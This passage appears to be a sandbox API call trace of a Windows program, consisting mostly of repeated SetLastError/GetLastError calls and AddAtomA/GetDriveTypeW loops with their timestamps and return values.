0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.433] SetLastError (dwErrCode=0x0) [0097.433] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.434] 
SetLastError (dwErrCode=0x0) [0097.434] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.435] GetLastError () returned 0x0 [0097.435] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.436] GetLastError () returned 0x0 [0097.436] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] 
SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.437] SetLastError (dwErrCode=0x0) [0097.437] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.438] SetLastError (dwErrCode=0x0) [0097.438] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] 
SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.439] SetLastError (dwErrCode=0x0) [0097.439] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.440] SetLastError (dwErrCode=0x0) [0097.440] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.441] 
SetLastError (dwErrCode=0x0) [0097.441] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.442] SetLastError (dwErrCode=0x0) [0097.442] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.443] GetLastError () returned 0x0 [0097.443] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] 
SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.444] SetLastError (dwErrCode=0x0) [0097.444] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.445] SetLastError (dwErrCode=0x0) [0097.445] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] 
SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.446] SetLastError (dwErrCode=0x0) [0097.446] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.502] SetLastError (dwErrCode=0x0) [0097.502] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.503] 
SetLastError (dwErrCode=0x0) [0097.503] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.504] SetLastError (dwErrCode=0x0) [0097.504] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] GetLastError () returned 0x0 [0097.505] SetLastError (dwErrCode=0x0) [0097.505] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0097.505] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0097.506] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.507] AddAtomA (lpString=0x0) returned 0x0 [0097.507] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA 
(lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.508] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.508] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.509] AddAtomA (lpString=0x0) returned 0x0 [0097.509] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) 
returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.510] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.510] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] 
GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.511] AddAtomA (lpString=0x0) returned 0x0 [0097.511] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA 
(lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.512] AddAtomA (lpString=0x0) returned 0x0 [0097.512] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.513] AddAtomA (lpString=0x0) returned 0x0 [0097.513] GetDriveTypeW (lpRootPathName=0x0) 
returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.514] AddAtomA (lpString=0x0) returned 0x0 [0097.514] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 [0097.515] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0097.515] AddAtomA (lpString=0x0) returned 0x0 